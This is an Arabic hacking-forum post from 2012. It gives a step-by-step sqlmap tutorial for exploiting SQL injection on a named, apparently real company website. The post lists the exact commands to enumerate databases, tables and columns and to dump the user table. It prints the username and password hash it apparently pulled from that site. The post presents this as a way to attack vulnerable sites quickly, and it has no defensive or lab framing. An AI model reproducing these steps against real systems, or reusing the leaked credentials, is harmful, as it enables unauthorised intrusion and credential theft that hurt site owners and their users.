|
|||||||
كيفية استغلال ثغرات من نوع sql بالباك تراك باحترافية :)
اهلا اعزائي زوار واعضاء هذ البيت الكبير شرح استغلال ثغرات sql في الباك تراك الكل يعرف انه ثغرات sql من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف
 |
|
|
أدوات الموضوع
|
انواع عرض الموضوع
|
منذ /12-11-2012, 07:18 PM
|
#1 | ||||||
|
V.I.P
شكراً: 3
تم شكره مرة واحدة في مشاركة واحدة
|
كيفية استغلال ثغرات من نوع sql بالباك تراك باحترافية :)
كيفية استغلال ثغرات من نوع sql بالباك تراك باحترافية اهلا اعزائي زوار واعضاء هذ البيت الكبير شرح استغلال ثغرات sql في الباك تراك الكل يعرف انه ثغرات sql من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة ممكنة باستخدام اداة في الباك تراك <br />اسم الأداة :sqlmap مسار الاداة : pentest/database/sqlmap لغة البرمجة : python الأن كيفية استخدام الاداة في عملية الحقن اولا : استخراج اسماء قواعد البيانات لنقل ان هذا الموقع مصاب بثغرة sql [url]http://www.bcspeakers.com/page.php?id=22[/url]<br />وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط واذا وجد خطأ كان الموقع مصاب <br />الأن الأمر المستخدم في استخراج القواعد لهذا الموقع<br />كود:<br />python sqlmap.py -u [url]http://www.bcspeakers.com/page.php?id=22[/url] --dbs<br />النتيجة كود: available databases [2]:[*] information_schema[*] www-bcspeakerstest<br />مثل ما شفتو تم استخراج القواعد والان القاعدة المستهدفة هي " www-bcspeakerstest"<br />ثانيا : استخراج الجداول القاعدة المستهدفة هي " www-bcspeakerstest"<br />سوف يكون الأمر بهذا الشكل كود: python sqlmap.py -u [url]http://www.bcspeakers.com/page.php?id=22[/url] -D www-bcspeakerstest --tables<br />والنتيجة كبيرة لن اضعها لانها تتكون من 59 جدول على كل حال انا وجدت الجدول المستهدف وهو "_user"<br />ثالثا : استخراج الأعمدة الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user"<br />الكود كالتالي كود: python sqlmap.py -u [url]http://www.bcspeakers.com/page.php?id=22[/url] -D www-bcspeakerstest -T _user --columns<br />والنتيجة كالتاليكود: +----------+---------------------------+ | Column | Type |<br />+----------+---------------------------+<br />| id_user | int(10) unsigned zerofill |<br />| password | text |<br />| username | text |<br />+----------+---------------------------+<br />كما ترون الأعمدة المستهدفة هي password username رابعا : اسخراج البيانات من الاعمدة العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي<br />كود: python sqlmap.py -u [url]http://www.bcspeakers.com/page.php?id=22[/url] -D www-bcspeakerstest -T _user -C username --dump<br />النتيجة كود: +--------------+ | username +--------------+<br />| becspeak2803 |<br />| becspeak2803 |<br />+--------------+<br />كما ترون استخرجنا اسم المستخدم والان نأتي الى استخراج الباسورود اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد<br />كود: python sqlmap.py -u [url]http://www.bcspeakers.com/page.php?id=22[/url] -D www-bcspeakerstest -T _user -C password --dump<br سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع قاعدة البيانات المرفقة باالأداة كود: recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] / تختار مثل ما نت عاوزانا اخترت لا لتسريع العملية والنتيجة كالتاليكود:+----------------------------------+<br />| password |<br />+----------------------------------+<br />| 286adae502ad9d5ab8c4f8644050b448 |<br />| 286adae502ad9d5ab8c4f8644050b448 |<br />+----------------------------------+<br />كما ترون تم استخراج البيانات بسرعة كبيرة اهداء الى الجميع بدون استثناء المصدر: development-point - للمزيد تابع : قسم توزيعات أختبار الأخترآق المتقدم ;dtdm hsjyghg eyvhj lk k,u sql fhgfh; jvh; fhpjvhtdm :) ;dtdm hsjyghg eyvhj lk k,u sql fhgfh; jvh; fhpjvhtdm
|
||||||
|
|
| مواقع النشر (المفضلة) |
| الكلمات الدلالية (Tags) |
| كيفية استغلال ثغرات من نوع sql بالباك تراك باحترافية |
جديد قسم توزيعات أختبار الأخترآق المتقدم
|
|
|
«
الموضوع السابق
|
الموضوع التالي
»
| الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1) | |
العرض العادي
|
|
|
المواضيع المتشابهه للموضوع: كيفية استغلال ثغرات من نوع sql بالباك تراك باحترافية :)
|
||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| كيفية ايجاد لوحة التحكم غصبا عنها بالباك تراك | SnipeR | قسم توزيعات أختبار الأخترآق المتقدم | 4 | 03-15-2013 06:38 PM |
| استفسارات الدرس السادس || دورة اختراق المواقع والسيرفرات الجزء الثاني || استغلال ثغرات sql | MhWy | دورة أختراق المواقع 2014 | 15 | 03-02-2013 12:25 AM |
| كيفية فك هاش من نوع md5 بالباك تراك | SnipeR | قسم توزيعات أختبار الأخترآق المتقدم | 1 | 12-11-2012 08:46 PM |
| الدرس السادس || دورة اختراق المواقع والسيرفرات الجزء الثاني || استغلال ثغرات sql | MhWy | دورة أختراق المواقع 2014 | 0 | 12-06-2012 03:19 PM |
| استغلال ثغرات اضافات موزيلا بأداة (cobaltsrike) خارج الشبكة حصري | windows 8 | قسم توزيعات أختبار الأخترآق المتقدم | 3 | 11-10-2012 05:24 AM |
الساعة الآن 01:17 AM